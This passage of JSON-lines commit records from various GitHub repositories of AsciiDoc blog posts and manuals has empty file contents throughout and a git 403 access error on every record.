2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecd0ef792a4e2d922792c1783805139cb471c2a4","subject":"Update 
2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5276c085dcf846fddaf29fc0eaf9ec01f773eb16","subject":"Delete the file at '_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","message":"Delete the file at '_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f3b48a5816393ad0537800f5c9a4df84722523","subject":"Update 2015-02-17-Post-1.adoc","message":"Update 2015-02-17-Post-1.adoc","repos":"DimShadoWWW\/blog,DimShadoWWW\/blog,DimShadoWWW\/blog","old_file":"_posts\/2015-02-17-Post-1.adoc","new_file":"_posts\/2015-02-17-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DimShadoWWW\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce13eaadc08abd0726edfed0969f06ba7310070","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DONTBuyTheGooglePixelBuds.adoc","new_file":"_posts\/2018-02-07-DONTBuyTheGooglePixelBuds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d8c5a028675f965efab2079d2c2f9ac7d56bdc3","subject":"adding instructions","message":"adding instructions\n","repos":"arun-gupta\/serverless","old_file":"lambda-rds\/readme.asciidoc","new_file":"lambda-rds\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arun-gupta\/serverless.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff45d1f2fd95d188ab2ed6acfd45950ab7c1823f","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 
2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b1f6bc540d17e6fd9c9711cd14e8364adb8a09c","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"601bb3767999a438a7b49f42ddb5b5b0ca55be96","subject":"Update 2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","message":"Update 2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","new_file":"_posts\/2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8699bc6effd3eb62ef9d151cc01e7e8f7bbaf28","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"142421a578bddcf6251a51a1ecbd6a26659f8043","subject":"y2b create post The New YouTube Share Button!","message":"y2b create post The New YouTube Share Button!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-14-The-New-YouTube-Share-Button.adoc","new_file":"_posts\/2016-06-14-The-New-YouTube-Share-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4868c30eaef84739745d85021a9c9215b71cb2e8","subject":"Update 2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","message":"Update 
2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","new_file":"_posts\/2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70239c1970137cb62bb81b1848273501eae83a6e","subject":"add info about OVA username\/password","message":"add info about OVA username\/password\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45fa8df314f053f7d2b72438e4a5fa17d2fc0d5b","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05c9dedb875d65081b5ab3e20579782c60266566","subject":"lecture #3: 20170906 notes","message":"lecture #3: 20170906 notes\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture02_20170906.adoc","new_file":"lecture02_20170906.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"482d04472d86d59fc420efede344bfa2d99ecf03","subject":"Update 2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","message":"Update 2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","new_file":"_posts\/2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d314ff939eed9e5a4afc5673de22ab1ae8ec62a","subject":"Update 2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","message":"Update 
2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","new_file":"_posts\/2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d5a49d3ac630694d3975692a34f565a50cbc407","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3ab123973d3a33c3c50ec6b7375f1dfc163ad29","subject":"Update 2015-02-24-change-3.adoc","message":"Update 2015-02-24-change-3.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-3.adoc","new_file":"_posts\/2015-02-24-change-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c3d525ee49049b1927d8df64e75a4326a4c35e","subject":"Update 2016-01-28-PythonIP.adoc","message":"Update 2016-01-28-PythonIP.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-28-PythonIP.adoc","new_file":"_posts\/2016-01-28-PythonIP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"087028782f2725d211463e7e96eed6c9833598e8","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f288f2985341e9a78e35ff4c5b888dec6a70e6ef","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"682eeb3bd8dd65b8e7e930565d44c6ce01edbdc8","subject":"add talk from Android 
meetup Berlin on 29th June 2016 at c-base","message":"add talk from Android meetup Berlin on 29th June 2016 at c-base\n","repos":"devisnik\/mines,devisnik\/mines,devisnik\/mines","old_file":"talk\/src\/docs\/asciidoc\/flag_em.adoc","new_file":"talk\/src\/docs\/asciidoc\/flag_em.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devisnik\/mines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"752924ddd68f45fa718f56d6f712afebc70b73ae","subject":"Update 2016-7-2-Life.adoc","message":"Update 2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-Life.adoc","new_file":"_posts\/2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac395879d1fb5b80f6ac38dcdbb6f07d7b6838e","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcdf5f81ba68cb8a79d85acd8cdb3bb91651ce67","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08d7348efe3ba7088d3b9d10b6002437c5098e76","subject":"y2b create post The Music of Unbox Therapy","message":"y2b create post The Music of Unbox Therapy","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-27-The-Music-of-Unbox-Therapy.adoc","new_file":"_posts\/2012-01-27-The-Music-of-Unbox-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04929a38b4982ffbe95034e8b6cc98820eca5337","subject":"add fields documentation generated by script","message":"add fields documentation generated by script\n","repos":"TheStigger\/dockerbeat,TheStigger\/dockerbeat,erwanncloarec\/dockerbeat,erwanncloarec\/dockerbeat","old_file":"doc\/fields.asciidoc","new_file":"doc\/fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erwanncloarec\/dockerbeat.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"78574627e951f97e5a7ff53c7e9e014fd7bce283","subject":"Update 2017-09-30-Log-collection-in-AWS-land.adoc","message":"Update 2017-09-30-Log-collection-in-AWS-land.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-09-30-Log-collection-in-AWS-land.adoc","new_file":"_posts\/2017-09-30-Log-collection-in-AWS-land.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7875c536b395639617f8d10d88bc8a6f77933658","subject":"Update 2015-11-25-Two-sides-of-the-same-coin.adoc","message":"Update 2015-11-25-Two-sides-of-the-same-coin.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-25-Two-sides-of-the-same-coin.adoc","new_file":"_posts\/2015-11-25-Two-sides-of-the-same-coin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"010d7ace29222a570f3798a1b333fdca77f74cae","subject":"y2b create post And Then It Began Floating...","message":"y2b create post And Then It Began Floating...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-04-And-Then-It-Began-Floating.adoc","new_file":"_posts\/2016-06-04-And-Then-It-Began-Floating.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"183a2d8f194116e4161ff40a74dee86a8c70c54a","subject":"fix manual to reflect reality of depfile cleaning","message":"fix manual to reflect reality of depfile cleaning\n\nFixes issue 
#362.\n","repos":"nico\/ninja,chenyukang\/ninja,dendy\/ninja,sxlin\/dist_ninja,chenyukang\/ninja,jendrikillner\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,jendrikillner\/ninja,nicolasdespres\/ninja,dorgonman\/ninja,curinir\/ninja,dendy\/ninja,metti\/ninja,lizh06\/ninja,jhanssen\/ninja,guiquanz\/ninja,jimon\/ninja,ctiller\/ninja,autopulated\/ninja,pathscale\/ninja,pck\/ninja,vvvrrooomm\/ninja,mgaunard\/ninja,mutac\/ninja,nocnokneo\/ninja,nico\/ninja,bradking\/ninja,tfarina\/ninja,kissthink\/ninja,jendrikillner\/ninja,jimon\/ninja,mutac\/ninja,mohamed\/ninja,rnk\/ninja,synaptek\/ninja,Ju2ender\/ninja,dpwright\/ninja,atetubou\/ninja,LuaDist\/ninja,atetubou\/ninja,lizh06\/ninja,pathscale\/ninja,autopulated\/ninja,dpwright\/ninja,glensc\/ninja,purcell\/ninja,yannicklm\/ninja,colincross\/ninja,mutac\/ninja,nocnokneo\/ninja,LuaDist\/ninja,bmeurer\/ninja,Ju2ender\/ninja,ndsol\/subninja,liukd\/ninja,glensc\/ninja,LuaDist\/ninja,nafest\/ninja,ndsol\/subninja,Qix-\/ninja,sgraham\/ninja,pck\/ninja,synaptek\/ninja,rjogrady\/ninja,atetubou\/ninja,metti\/ninja,jsternberg\/ninja,jhanssen\/ninja,dorgonman\/ninja,ninja-build\/ninja,automeka\/ninja,mgaunard\/ninja,LuaDist\/ninja,fifoforlifo\/ninja,barak\/ninja,maruel\/ninja,yannicklm\/ninja,lizh06\/ninja,mohamed\/ninja,yannicklm\/ninja,kissthink\/ninja,metti\/ninja,AoD314\/ninja,fifoforlifo\/ninja,guiquanz\/ninja,ikarienator\/ninja,nocnokneo\/ninja,Maratyszcza\/ninja-pypi,dendy\/ninja,dabrahams\/ninja,curinir\/ninja,kimgr\/ninja,ilor\/ninja,kimgr\/ninja,sxlin\/dist_ninja,moroten\/ninja,maruel\/ninja,pathscale\/ninja,kissthink\/ninja,sorbits\/ninja,jsternberg\/ninja,ignatenkobrain\/ninja,fuchsia-mirror\/third_party-ninja,TheOneRing\/ninja,nico\/ninja,bradking\/ninja,syntheticpp\/ninja,rjogrady\/ninja,martine\/ninja,liukd\/ninja,sxlin\/dist_ninja,mdempsky\/ninja,TheOneRing\/ninja,colincross\/ninja,hnney\/ninja,nicolasdespres\/ninja,autopulated\/ninja,kissthink\/ninja,curinir\/ninja,mdempsky\/ninja,mydongistiny\/ninja,guiquanz\/ninja,ilor\/ninja,Ju2ender\/ninja,sorbits\/ninja,guiquanz\/ninja,TheOneRing\/ninja,sorbits\/ninja,Maratyszcza\/ninja-pypi,nickhutchinson\/ninja,rnk\/ninja,nafest\/ninja,rjogrady\/ninja,tfarina\/ninja,vvvrrooomm\/ninja,syntheticpp\/ninja,ikarienator\/ninja,drbo\/ninja,mdempsky\/ninja,mutac\/ninja,mgaunard\/ninja,autopulated\/ninja,synaptek\/ninja,Qix-\/ninja,automeka\/ninja,dpwright\/ninja,dabrahams\/ninja,mohamed\/ninja,Ju2ender\/ninja,nafest\/ninja,hnney\/ninja,moroten\/ninja,okuoku\/ninja,ikarienator\/ninja,ignatenkobrain\/ninja,nicolasdespres\/ninja,iwadon\/ninja,nickhutchinson\/ninja,dabrahams\/ninja,mgaunard\/ninja,juntalis\/ninja,fuchsia-mirror\/third_party-ninja,fuchsia-mirror\/third_party-ninja,fuchsia-mirror\/third_party-ninja,mohamed\/ninja,TheOneRing\/ninja,sgraham\/ninja,ctiller\/ninja,vvvrrooomm\/ninja,iwadon\/ninja,kimgr\/ninja,jsternberg\/ninja,jhanssen\/ninja,rnk\/ninja,drbo\/ninja,purcell\/ninja,okuoku\/ninja,Maratyszcza\/ninja-pypi,pck\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,dorgonman\/ninja,pck\/ninja,mydongistiny\/ninja,mydongistiny\/ninja,chenyukang\/ninja,purcell\/ninja,chenyukang\/ninja,martine\/ninja,jhanssen\/ninja,automeka\/ninja,ctiller\/ninja,liukd\/ninja,nickhutchinson\/ninja,ninja-build\/ninja,jimon\/ninja,ThiagoGarciaAlves\/ninja,tfarina\/ninja,ThiagoGarciaAlves\/ninja,moroten\/ninja,liukd\/ninja,drbo\/ninja,bradking\/ninja,hnney\/ninja,glensc\/ninja,ninja-build\/ninja,moroten\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,sgraham\/ninja,yannicklm\/ninja,maruel\/ninja,atetubou\/ninja,mydongis
tiny\/ninja,AoD314\/ninja,jendrikillner\/ninja,dendy\/ninja,sxlin\/dist_ninja,ndsol\/subninja,ikarienator\/ninja,bmeurer\/ninja,hnney\/ninja,jsternberg\/ninja,okuoku\/ninja,AoD314\/ninja,jimon\/ninja,rjogrady\/ninja,ignatenkobrain\/ninja,automeka\/ninja,pathscale\/ninja,nafest\/ninja,barak\/ninja,AoD314\/ninja,sxlin\/dist_ninja,nicolasdespres\/ninja,dabrahams\/ninja,synaptek\/ninja,martine\/ninja,barak\/ninja,bradking\/ninja,juntalis\/ninja,iwadon\/ninja,ilor\/ninja,iwadon\/ninja,sxlin\/dist_ninja,fifoforlifo\/ninja,fifoforlifo\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,rnk\/ninja,bmeurer\/ninja,sxlin\/dist_ninja,maruel\/ninja,ninja-build\/ninja,colincross\/ninja,syntheticpp\/ninja,sorbits\/ninja,dpwright\/ninja,sgraham\/ninja,syntheticpp\/ninja,okuoku\/ninja,Qix-\/ninja,juntalis\/ninja,purcell\/ninja,glensc\/ninja,kimgr\/ninja,barak\/ninja,nocnokneo\/ninja,curinir\/ninja,vvvrrooomm\/ninja,juntalis\/ninja,ctiller\/ninja,Qix-\/ninja,nico\/ninja,drbo\/ninja,dorgonman\/ninja,ilor\/ninja,metti\/ninja,ndsol\/subninja,martine\/ninja,bmeurer\/ninja,tfarina\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"576f137555778695c3a0d3d1d890d4eedefff265","subject":"Update 2015-03-28-Strong-Viking-Mud-Edition.adoc","message":"Update 2015-03-28-Strong-Viking-Mud-Edition.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-28-Strong-Viking-Mud-Edition.adoc","new_file":"_posts\/2015-03-28-Strong-Viking-Mud-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cdfbd7203a62ef66a9bc67c903b079e6a61d9df","subject":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc' to '_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","message":"Renamed '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc' to '_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad07486a5574acababe30d4263e7569679f871ba","subject":"Update 2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","message":"Update 2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","new_file":"_posts\/2017-06-10-Conversion-between-View-Space-Linear-and-Screen-Space-Linear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"bd56e51c12ac942a8b218dc3f6525b9d50532201","subject":"HAWKULAR-1094 - Updated the release instructions.","message":"HAWKULAR-1094 - Updated the release instructions.\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bda8336068fedb28564c6ab04b6dea31ad22e74","subject":"Document development practices.","message":"Document development practices.\n\nSigned-off-by: Jere Lepp\u00e4nen <14957520de8d9815e0c353a07fe23c737f0171e9@nokia.com>\nReviewed-by: Sorin Vultureanu <8013ba55f8675034bc2ab0d6c3a1c9650437ca36@enea.com>\nReviewed-by: Brian Brooks 